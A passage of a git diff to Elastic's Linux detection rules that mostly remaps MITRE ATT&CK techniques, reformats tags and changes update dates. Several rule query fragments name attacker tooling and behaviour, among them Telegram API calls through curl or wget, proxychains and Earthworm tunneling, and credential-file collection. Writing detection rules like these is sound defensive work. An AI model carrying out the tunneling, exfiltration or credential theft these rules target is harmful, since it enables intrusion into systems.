"2026/03/23" +updated_date = "2025/09/16" [transform] [[transform.osquery]] @@ -128,7 +128,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=3s @@ -149,11 +156,6 @@ sequence by host.id, process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" @@ -162,15 +164,13 @@ reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1048.003" -name = "Exfiltration Over Unencrypted Non-C2 Protocol" -reference = "https://attack.mitre.org/techniques/T1048/003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0010" diff --git a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml index ec8b3e38082..5356874e6a6 100644 --- a/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml +++ b/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -97,7 +97,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=10s @@ -111,15 +119,13 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1203" @@ -130,3 +136,19 @@ reference = "https://attack.mitre.org/techniques/T1203/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml index 62bb09e0ed4..cfdde4aab58 100644 --- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml +++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/16" [rule] author = ["Elastic"] @@ -125,9 +125,9 @@ Curl is a versatile command-line tool used for transferring data with URLs, ofte framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml index ebb3cfff1cb..8e5b77e396f 100644 --- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml +++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/16" [rule] author = ["Elastic"] @@ -117,9 +117,9 @@ sequence by process.entity_id, host.id with maxspan=10s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_ip_forwarding_activity.toml b/rules/linux/command_and_control_ip_forwarding_activity.toml index 3357c9ea7ff..f810448aa2e 100644 --- a/rules/linux/command_and_control_ip_forwarding_activity.toml +++ b/rules/linux/command_and_control_ip_forwarding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -93,14 +93,9 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - -[[rule.threat.technique.subtechnique]] -id = "T1090.001" -name = "Internal Proxy" -reference = "https://attack.mitre.org/techniques/T1090/001/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_kubectl_networking_modification.toml b/rules/linux/command_and_control_kubectl_networking_modification.toml index 43c150612d1..7eb417f4e4d 100644 --- a/rules/linux/command_and_control_kubectl_networking_modification.toml +++ b/rules/linux/command_and_control_kubectl_networking_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -122,16 +122,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml index 49fe7f35a5a..acd204dae9a 100644 --- a/rules/linux/command_and_control_linux_kworker_netcon.toml +++ b/rules/linux/command_and_control_linux_kworker_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/24" [rule] author = ["Elastic"] @@ -46,7 +46,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -103,20 +110,42 @@ Kworker processes are integral to Linux systems, handling kernel tasks like inte [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.005" -name = "Match Legitimate Resource Name or Location" -reference = "https://attack.mitre.org/techniques/T1036/005/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/command_and_control_linux_proxychains_activity.toml b/rules/linux/command_and_control_linux_proxychains_activity.toml index 86f11516b7b..c86530e3580 100644 --- a/rules/linux/command_and_control_linux_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [transform] [[transform.osquery]] @@ -140,9 +140,9 @@ process.name == "proxychains" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml index 0eb28ef7597..b4d383c26e2 100644 --- a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml +++ b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -111,7 +111,17 @@ references = ["https://book.hacktricks.xyz/generic-methodologies-and-resources/t risk_score = 21 rule_id = "29f0cf93-d17c-4b12-b4f3-a433800539fa" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -124,31 +134,14 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml index ccb257c05e8..6af65daf2cc 100644 --- a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [transform] [[transform.osquery]] @@ -170,9 +170,9 @@ process.name == "proxychains" and process.args : ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml index 5bc19c76442..a32949a8673 100644 --- a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml +++ b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [transform] [[transform.osquery]] @@ -193,11 +193,6 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml index 31058ef855f..971d4da2b10 100644 --- a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml +++ b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -118,11 +118,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_potential_tunneling_command_line.toml b/rules/linux/command_and_control_potential_tunneling_command_line.toml index 4bba96a97cd..f0209e6a64a 100644 --- a/rules/linux/command_and_control_potential_tunneling_command_line.toml +++ b/rules/linux/command_and_control_potential_tunneling_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/12" [transform] [[transform.osquery]] @@ -170,11 +170,6 @@ process.command_line regex """.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_telegram_api_request.toml b/rules/linux/command_and_control_telegram_api_request.toml index 43f28f4633f..7c6867e61ea 100644 --- a/rules/linux/command_and_control_telegram_api_request.toml +++ b/rules/linux/command_and_control_telegram_api_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -120,12 +120,17 @@ process.name in ("curl", "wget") and process.command_line like "*api.telegram.or [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml index 426efda183d..be519817da2 100644 --- a/rules/linux/command_and_control_tunneling_via_earthworm.toml +++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [transform] [[transform.osquery]] @@ -177,11 +177,6 @@ process.args : "-s" and process.args : "-d" and process.args : "rssocks" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml index 2bd89455114..71d52ec71c9 100644 --- a/rules/linux/credential_access_collection_sensitive_files.toml +++ b/rules/linux/credential_access_collection_sensitive_files.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/22" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -153,6 +153,24 @@ Compression utilities like zip, tar, and gzip are essential for efficiently mana [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -168,23 +186,6 @@ id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line", "process.parent.executable"] diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml index 32c71e4856a..417321d89b0 100644 --- a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml +++ b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -101,24 +101,6 @@ Containers are lightweight, portable environments used to run applications consi [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1560" -name = "Archive Collected Data" -reference = "https://attack.mitre.org/techniques/T1560/" - -[[rule.threat.technique.subtechnique]] -id = "T1560.001" -name = "Archive via Utility" -reference = "https://attack.mitre.org/techniques/T1560/001/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" @@ -133,3 +115,21 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/credential_access_gdb_init_process_hooking.toml b/rules/linux/credential_access_gdb_init_process_hooking.toml index ef6dd41d452..646c05881fc 100644 --- a/rules/linux/credential_access_gdb_init_process_hooking.toml +++ b/rules/linux/credential_access_gdb_init_process_hooking.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -113,6 +113,11 @@ id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.007" +name = "Proc Filesystem" +reference = "https://attack.mitre.org/techniques/T1003/007/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml index de89947a394..af461be6f71 100644 --- a/rules/linux/credential_access_gdb_process_hooking.toml +++ b/rules/linux/credential_access_gdb_process_hooking.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -62,7 +62,18 @@ references = ["https://github.com/controlplaneio/truffleproc", "https://github.c risk_score = 21 rule_id = "66c058f3-99f4-4d18-952b-43348f2577a0" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -76,26 +87,19 @@ process.args != "1" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.007" +name = "Proc Filesystem" +reference = "https://attack.mitre.org/techniques/T1003/007/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/linux/credential_access_gh_auth_via_nodejs.toml b/rules/linux/credential_access_gh_auth_via_nodejs.toml index ad32bc2cae0..1ab982a0861 100644 --- a/rules/linux/credential_access_gh_auth_via_nodejs.toml +++ b/rules/linux/credential_access_gh_auth_via_nodejs.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -48,7 +48,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -59,6 +69,11 @@ process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" @@ -68,3 +83,16 @@ reference = "https://attack.mitre.org/techniques/T1528/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml index d3e1807cea8..b4054ccf7f8 100644 --- a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml +++ b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -82,7 +82,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -124,22 +134,30 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_manual_memory_dumping.toml b/rules/linux/credential_access_manual_memory_dumping.toml index 1d2376ab2fb..d6f5ffe2135 100644 --- a/rules/linux/credential_access_manual_memory_dumping.toml +++ b/rules/linux/credential_access_manual_memory_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -120,6 +120,11 @@ id = "T1003.007" name = "Proc Filesystem" reference = "https://attack.mitre.org/techniques/T1003/007/" +[[rule.threat.technique]] +id = "T1212" +name = "Exploitation for Credential Access" +reference = "https://attack.mitre.org/techniques/T1212/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml index fc9c5844bef..3cfe8812e89 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/14" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 